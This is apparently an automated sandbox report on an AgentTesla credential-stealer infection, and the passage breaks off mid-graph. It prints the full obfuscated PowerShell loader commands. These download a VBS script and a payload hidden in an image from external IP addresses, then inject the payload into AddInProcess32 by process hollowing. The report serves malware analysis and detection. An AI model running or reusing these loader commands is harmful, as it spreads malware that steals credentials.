                        Commandline:poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                        Imagebase:0x13fc40000
                        File size:443'392 bytes
                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:8
                        Start time:12:03:31
                        Start date:03/07/2024
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"
                        Imagebase:0x13f1e0000
                        File size:2'758'280 bytes
                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:12:03:32
                        Start date:03/07/2024
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"
                        Imagebase:0x13fe00000
                        File size:52'744 bytes
                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:11
                        Start time:12:03:37
                        Start date:03/07/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS"
                        Imagebase:0xff700000
                        File size:168'960 bytes
                        MD5 hash:045451FA238A75305CC26AC982472367
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:12:03:38
                        Start date:03/07/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
                        Imagebase:0x13fc40000
                        File size:443'392 bytes
                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:true

                        Target ID:14
                        Start time:12:03:45
                        Start date:03/07/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                        Imagebase:0x1020000
                        File size:42'056 bytes
                        MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.619170569.0000000002465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Call Graph

                        • Entrypoint
                        • Decryption Function
                        • Executed
                        • Not Executed
                        • Show Help
                        callgraph 1 Error: Graph is empty

                        Module: Sheet1

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet1"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: Sheet2

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet2"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: Sheet3

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "Sheet3"

                        2

                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Module: ThisWorkbook

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "ThisWorkbook"

                        2

                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = False

                        8

                        Attribute VB_Customizable = True

                        Reset < >
                          Memory Dump Source
                          • Source File: 00000004.00000003.464943212.0000000003290000.00000010.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_3_3290000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                          • Instruction ID: 1a94b133b30e0d8eb7574468eda1d4598df7cf8fa14fda9190fdd2dbbb0f4b2e
                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                          • Instruction Fuzzy Hash:
                          Memory Dump Source
                          • Source File: 00000004.00000003.464943212.0000000003290000.00000010.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_3_3290000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                          • Instruction ID: 1a94b133b30e0d8eb7574468eda1d4598df7cf8fa14fda9190fdd2dbbb0f4b2e
                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                          • Instruction Fuzzy Hash:

                          Execution Graph

                          Execution Coverage:4.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 4030 7fe899e7ae1 4031 7fe899e7af1 URLDownloadToFileW 4030->4031 4033 7fe899e7bf3 4031->4033

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.491302403.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe899e0000_powershell.jbxd
                          Similarity
                          • API ID: DownloadFile
                          • String ID:
                          • API String ID: 1407266417-0
                          • Opcode ID: 34a794edae3f87f32515174677df9acf803afd62f993b18b4119d4bb5f4031b8
                          • Instruction ID: 531e2c03ea37ad0ace25baee197a551d2087d538d4d39d78cc7af3977b5b8b0d
                          • Opcode Fuzzy Hash: 34a794edae3f87f32515174677df9acf803afd62f993b18b4119d4bb5f4031b8
                          • Instruction Fuzzy Hash: 09319031908A5C9FDB58EF58D8857A9B7E1FB59711F04822ED04DD3662CB70A8058B81

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.491372827.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe89ab0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: V
                          • API String ID: 0-1342839628
                          • Opcode ID: 4a9ce835cca6e490a8b618dd39456f8555a714290a9f337101efb0c42fde9fec
                          • Instruction ID: 1e3a49380bb5f80eca4e8901a062f149d2f03e11c39f2ea8582bbcc7cdc982f3
                          • Opcode Fuzzy Hash: 4a9ce835cca6e490a8b618dd39456f8555a714290a9f337101efb0c42fde9fec
                          • Instruction Fuzzy Hash: 3ED1173180E7C91FD357973858146B57FA4EF47260F0911EBD48DCB0A3D619AD5AC3A2

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.491302403.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe899e0000_powershell.jbxd
                          Similarity
                          • API ID: DownloadFile
                          • String ID:
                          • API String ID: 1407266417-0
                          • Opcode ID: 37ae42287ad025a01c4878b76a4a11a5d7a13ff8caf1d3569e18c4c896d6c5e5
                          • Instruction ID: b2e158e5e66a5a86b939e5869275a6e9c7804e65d82aeb849d6df338f0c49118
                          • Opcode Fuzzy Hash: 37ae42287ad025a01c4878b76a4a11a5d7a13ff8caf1d3569e18c4c896d6c5e5
                          • Instruction Fuzzy Hash: 7D41097180CB889FD719DB6898447F97BF4FB56321F04826FD08DD3562CB646805C782

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 85 7fe89ab8549-7fe89ab85f9 86 7fe89ab8add-7fe89ab8b96 85->86 87 7fe89ab85ff-7fe89ab8609 85->87 88 7fe89ab860b-7fe89ab8618 87->88 89 7fe89ab8622-7fe89ab8629 87->89 88->89 93 7fe89ab861a-7fe89ab8620 88->93 90 7fe89ab862b-7fe89ab863e 89->90 91 7fe89ab8640 89->91 94 7fe89ab8642-7fe89ab8644 90->94 91->94 93->89 95 7fe89ab864a-7fe89ab8656 94->95 96 7fe89ab8a58-7fe89ab8a62 94->96 95->86 99 7fe89ab865c-7fe89ab8666 95->99 100 7fe89ab8a64-7fe89ab8a74 96->100 101 7fe89ab8a75-7fe89ab8a85 96->101 104 7fe89ab8668-7fe89ab8675 99->104 105 7fe89ab8682-7fe89ab8692 99->105 102 7fe89ab8a87-7fe89ab8a8b 101->102 103 7fe89ab8a92-7fe89ab8adc 101->103 102->103 104->105 107 7fe89ab8677-7fe89ab8680 104->107 105->96 112 7fe89ab8698-7fe89ab86cc 105->112 107->105 112->96 117 7fe89ab86d2-7fe89ab86de 112->117 117->86 118 7fe89ab86e4-7fe89ab86ee 117->118 119 7fe89ab8707-7fe89ab870c 118->119 120 7fe89ab86f0-7fe89ab86fd 118->120 119->96 122 7fe89ab8712-7fe89ab8717 119->122 120->119 121 7fe89ab86ff-7fe89ab8705 120->121 121->119 122->96 123 7fe89ab871d-7fe89ab8722 122->123 123->96 125 7fe89ab8728-7fe89ab8737 123->125 126 7fe89ab8747 125->126 127 7fe89ab8739-7fe89ab8743 125->127 130 7fe89ab874c-7fe89ab8759 126->130 128 7fe89ab8763-7fe89ab87ee 127->128 129 7fe89ab8745 127->129 137 7fe89ab8802-7fe89ab8824 128->137 138 7fe89ab87f0-7fe89ab87fb 128->138 129->130 130->128 131 7fe89ab875b-7fe89ab8761 130->131 131->128 139 7fe89ab8826-7fe89ab8830 137->139 140 7fe89ab8834 137->140 138->137 141 7fe89ab8832 139->141 142 7fe89ab8850-7fe89ab88de 139->142 143 7fe89ab8839-7fe89ab8846 140->143 141->143 150 7fe89ab88f2-7fe89ab8910 142->150 151 7fe89ab88e0-7fe89ab88eb 142->151 143->142 144 7fe89ab8848-7fe89ab884e 143->144 144->142 152 7fe89ab8912-7fe89ab891c 150->152 153 7fe89ab8920 150->153 151->150 154 7fe89ab893d-7fe89ab89cd 152->154 155 7fe89ab891e 152->155 156 7fe89ab8925-7fe89ab8933 153->156 163 7fe89ab89cf-7fe89ab89da 154->163 164 7fe89ab89e1-7fe89ab8a3a 154->164 155->156 156->154 157 7fe89ab8935-7fe89ab893b 156->157 157->154 163->164 167 7fe89ab8a42-7fe89ab8a57 164->167
                          Memory Dump Source
                          • Source File: 00000007.00000002.491372827.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe89ab0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38178bb456de93e604a9211edbf4c073e7e7c76da70790b901626f201fe29a48
                          • Instruction ID: 74f27e8377cb3a8d09caaa1221cd1846f215f67989287ff77eb894979bbe6118
                          • Opcode Fuzzy Hash: 38178bb456de93e604a9211edbf4c073e7e7c76da70790b901626f201fe29a48
                          • Instruction Fuzzy Hash: 5A22F63090CB894FD79ADB2C94607697BE2FF9A744F1400EED44ED72A3DA24AC56C741

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 168 7fe89ab4165-7fe89ab4198 169 7fe89ab419a-7fe89ab41a8 168->169 169->169 170 7fe89ab41aa-7fe89ab41f4 169->170 171 7fe89ab41fa-7fe89ab4204 170->171 172 7fe89ab4457-7fe89ab4516 170->172 173 7fe89ab421d-7fe89ab4222 171->173 174 7fe89ab4206-7fe89ab4213 171->174 177 7fe89ab43fb-7fe89ab4405 173->177 178 7fe89ab4228-7fe89ab422b 173->178 174->173 175 7fe89ab4215-7fe89ab421b 174->175 175->173 181 7fe89ab4407-7fe89ab4413 177->181 182 7fe89ab4414-7fe89ab4424 177->182 179 7fe89ab422d-7fe89ab4240 178->179 180 7fe89ab4242 178->180 187 7fe89ab4244-7fe89ab4246 179->187 180->187 183 7fe89ab4426-7fe89ab442a 182->183 184 7fe89ab4431-7fe89ab4454 182->184 183->184 184->172 187->177 188 7fe89ab424c-7fe89ab4280 187->188 195 7fe89ab4297 188->195 196 7fe89ab4282-7fe89ab4295 188->196 197 7fe89ab4299-7fe89ab429b 195->197 196->197 197->177 199 7fe89ab42a1-7fe89ab42a9 197->199 199->172 200 7fe89ab42af-7fe89ab42b9 199->200 201 7fe89ab42bb-7fe89ab42c8 200->201 202 7fe89ab42d5-7fe89ab42e5 200->202 201->202 203 7fe89ab42ca-7fe89ab42d3 201->203 202->177 205 7fe89ab42eb-7fe89ab431c 202->205 203->202 205->177 209 7fe89ab4322-7fe89ab434e 205->209 211 7fe89ab4374 209->211 212 7fe89ab4350-7fe89ab4372 209->212 213 7fe89ab4376-7fe89ab4378 211->213 212->213 213->177 214 7fe89ab437e-7fe89ab4386 213->214 216 7fe89ab4396 214->216 217 7fe89ab4388-7fe89ab4392 214->217 221 7fe89ab439b-7fe89ab43a8 216->221 218 7fe89ab43b2-7fe89ab43e1 217->218 219 7fe89ab4394 217->219 225 7fe89ab43e8-7fe89ab43fa 218->225 219->221 221->218 222 7fe89ab43aa-7fe89ab43b0 221->222 222->218
                          Memory Dump Source
                          • Source File: 00000007.00000002.491372827.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe89ab0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7df81732671e046d63cb2a228ed5890a90950b1a361920007c77ab627022f9d4
                          • Instruction ID: 9a7c5f63699e0f232335f7a3fea2bebd0fb12381f69a8daa89c3c513e3d61501
                          • Opcode Fuzzy Hash: 7df81732671e046d63cb2a228ed5890a90950b1a361920007c77ab627022f9d4
                          • Instruction Fuzzy Hash: AFC1473090DBCD4FE74AE72854546BA7FE1EF46784F1900EAD48ECB1A3C618AC16C361

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 226 7fe89ab10d3-7fe89ab10dc 227 7fe89ab10ed-7fe89ab1124 226->227 228 7fe89ab10de-7fe89ab10eb 226->228 229 7fe89ab112a-7fe89ab119e 227->229 230 7fe89ab11c1-7fe89ab11cb 227->230 228->227 240 7fe89ab11a6-7fe89ab11be 229->240 231 7fe89ab11cd-7fe89ab11d7 230->231 232 7fe89ab11d8-7fe89ab11e8 230->232 233 7fe89ab11ea-7fe89ab11ee 232->233 234 7fe89ab11f5-7fe89ab121a 232->234 233->234 240->230
                          Memory Dump Source
                          • Source File: 00000007.00000002.491372827.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe89ab0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1597b091038a849a9167737a7ebc4c42cfee533e4449dc49ef76c0081ad3203
                          • Instruction ID: 1b38f1a728674197ea89650dc8581f9665ec24b7d19fa318204f394d47404c8c
                          • Opcode Fuzzy Hash: e1597b091038a849a9167737a7ebc4c42cfee533e4449dc49ef76c0081ad3203
                          • Instruction Fuzzy Hash: 1E41C511B0DBC90FE347937C28642657FE1EF4B255B2911EBC48ECB1A3D9099C5AC361
                          Memory Dump Source
                          • Source File: 00000007.00000002.491372827.000007FE89AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7fe89ab0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 910b8dd8884096d80f2174225b9c8702b7798e0a7f28c7dc9297fffcd2e53a95
                          • Instruction ID: cb854fa77af45642cf71ff9d5e4902c5956f7065086d3d3cd6f1f3e800a5ae0c
                          • Opcode Fuzzy Hash: 910b8dd8884096d80f2174225b9c8702b7798e0a7f28c7dc9297fffcd2e53a95
                          • Instruction Fuzzy Hash: 72A1162090EBCD0FD747A77898246A67FE1EF4B254F1901EBD48DCB1A3D618991AC362

                          Execution Graph

                          Execution Coverage:5.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:12
                          Total number of Limit Nodes:0
                          execution_graph 4122 7fe899ca45d 4123 7fe899ca46b ResumeThread 4122->4123 4125 7fe899ca562 4123->4125 4126 7fe899cae2d 4127 7fe899cae9a CreateProcessA 4126->4127 4129 7fe899cb296 4127->4129 4130 7fe899ca90d 4131 7fe899ca91b WriteProcessMemory 4130->4131 4133 7fe899caa98 4131->4133 4134 7fe899ca5b5 4135 7fe899ca5c3 Wow64SetThreadContext 4134->4135 4137 7fe899ca6f8 4135->4137

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7fe89a92e0e-7fe89a92e50 2 7fe89a92e52-7fe89a92e72 0->2 3 7fe89a92e73-7fe89a92e94 0->3 2->3 4 7fe89a92e9a-7fe89a92ea4 3->4 5 7fe89a93083-7fe89a9312d 3->5 6 7fe89a92ea6-7fe89a92eb3 4->6 7 7fe89a92ebd-7fe89a92ec2 4->7 39 7fe89a93130-7fe89a93141 5->39 40 7fe89a9312f 5->40 6->7 9 7fe89a92eb5-7fe89a92ebb 6->9 10 7fe89a92ec8-7fe89a92ecb 7->10 11 7fe89a93024-7fe89a9302e 7->11 9->7 14 7fe89a92ecd-7fe89a92ee0 10->14 15 7fe89a92ee2 10->15 12 7fe89a9303d-7fe89a9304d 11->12 13 7fe89a93030-7fe89a9303c 11->13 18 7fe89a9305a-7fe89a93080 12->18 19 7fe89a9304f-7fe89a93053 12->19 16 7fe89a92ee4-7fe89a92ee6 14->16 15->16 16->11 21 7fe89a92eec-7fe89a92f23 16->21 18->5 19->18 27 7fe89a92f47 21->27 28 7fe89a92f25-7fe89a92f45 21->28 30 7fe89a92f49-7fe89a92f4b 27->30 28->30 30->11 33 7fe89a92f51-7fe89a92f54 30->33 34 7fe89a92f56-7fe89a92f69 33->34 35 7fe89a92f6b 33->35 36 7fe89a92f6d-7fe89a92f6f 34->36 35->36 36->11 41 7fe89a92f75-7fe89a92faf 36->41 42 7fe89a93144-7fe89a93170 39->42 43 7fe89a93143 39->43 40->39 52 7fe89a92fc8-7fe89a92fce 41->52 53 7fe89a92fb1-7fe89a92fbe 41->53 44 7fe89a931a2-7fe89a931a9 42->44 45 7fe89a93172-7fe89a93178 42->45 43->42 47 7fe89a931aa 44->47 45->47 48 7fe89a9317a-7fe89a93188 45->48 50 7fe89a931ab-7fe89a931c4 47->50 49 7fe89a9318a-7fe89a9319f 48->49 48->50 49->44 54 7fe89a931c6-7fe89a931d0 50->54 55 7fe89a9322d-7fe89a93278 50->55 59 7fe89a92fea-7fe89a92fed 52->59 60 7fe89a92fd0-7fe89a92fdd 52->60 53->52 56 7fe89a92fc0-7fe89a92fc6 53->56 57 7fe89a931e6-7fe89a9320e 54->57 58 7fe89a931d2-7fe89a931df 54->58 72 7fe89a9327a-7fe89a93299 55->72 73 7fe89a9329b-7fe89a932b9 55->73 56->52 68 7fe89a93210-7fe89a9321b 57->68 69 7fe89a93222-7fe89a9322c 57->69 58->57 62 7fe89a931e1 58->62 65 7fe89a92ff4-7fe89a92ffd 59->65 60->59 63 7fe89a92fdf-7fe89a92fe8 60->63 62->57 63->59 70 7fe89a93016-7fe89a93023 65->70 71 7fe89a92fff-7fe89a9300c 65->71 68->69 71->70 75 7fe89a9300e-7fe89a93014 71->75 72->73 76 7fe89a932bf-7fe89a932e4 73->76 77 7fe89a93384-7fe89a9338e 73->77 75->70 76->77 86 7fe89a932ea-7fe89a932ed 76->86 78 7fe89a9339d-7fe89a933ad 77->78 79 7fe89a93390-7fe89a9339c 77->79 80 7fe89a933ba-7fe89a933e0 78->80 81 7fe89a933af-7fe89a933b3 78->81 88 7fe89a933e3-7fe89a933f9 80->88 81->80 86->77 87 7fe89a932f3-7fe89a93303 86->87 89 7fe89a93310-7fe89a9334e 87->89 90 7fe89a93305-7fe89a9330e 87->90 94 7fe89a933fd-7fe89a9343c 88->94 95 7fe89a933fb 88->95 89->88 102 7fe89a93354-7fe89a93381 89->102 90->89 96 7fe89a9343d-7fe89a93463 94->96 95->94 95->96 98 7fe89a934a0-7fe89a934aa 96->98 99 7fe89a93465-7fe89a9347a 96->99 100 7fe89a934b6-7fe89a934c6 98->100 101 7fe89a934ac-7fe89a934b5 98->101 99->98 103 7fe89a9347c-7fe89a9347f 99->103 104 7fe89a934c8-7fe89a934cc 100->104 105 7fe89a934d3-7fe89a934f6 100->105 102->77 103->98 106 7fe89a93481-7fe89a9349f 103->106 104->105
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.515226150.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7fe89a90000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (bg$XhV$XhV$XhV$XhV$$L
                          • API String ID: 0-880475792
                          • Opcode ID: 299e92bb6d779f855ecbff30c02e10f89f971a8ab98f771abfb2490903da8e5b
                          • Instruction ID: 29b51b18049f2fd7952961f075fc379c02184a7e336d1992883187587563d1f7
                          • Opcode Fuzzy Hash: 299e92bb6d779f855ecbff30c02e10f89f971a8ab98f771abfb2490903da8e5b
                          • Instruction Fuzzy Hash: D932E220A0DBCA0FE757A33858642B97FE1EF97254B1900EBC49ECB1E3D918AC55C352

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 110 7fe899cae2d-7fe899caf08 114 7fe899caf0a-7fe899caf29 110->114 115 7fe899caf7d-7fe899cafbc 110->115 114->115 118 7fe899caf2b-7fe899caf35 114->118 119 7fe899cafbe-7fe899cafdd 115->119 120 7fe899cb031-7fe899cb0cb 115->120 121 7fe899caf37-7fe899caf4a 118->121 122 7fe899caf6f-7fe899caf77 118->122 119->120 127 7fe899cafdf-7fe899cafe9 119->127 129 7fe899cb0cd-7fe899cb0ec 120->129 130 7fe899cb140-7fe899cb294 CreateProcessA 120->130 123 7fe899caf4c 121->123 124 7fe899caf4e-7fe899caf61 121->124 122->115 123->124 124->124 128 7fe899caf63-7fe899caf6b 124->128 131 7fe899cafeb-7fe899caffe 127->131 132 7fe899cb023-7fe899cb02b 127->132 128->122 129->130 138 7fe899cb0ee-7fe899cb0f8 129->138 148 7fe899cb29c-7fe899cb38f call 7fe899cb3ab 130->148 149 7fe899cb296 130->149 133 7fe899cb002-7fe899cb015 131->133 134 7fe899cb000 131->134 132->120 133->133 137 7fe899cb017-7fe899cb01f 133->137 134->133 137->132 140 7fe899cb0fa-7fe899cb10d 138->140 141 7fe899cb132-7fe899cb13a 138->141 142 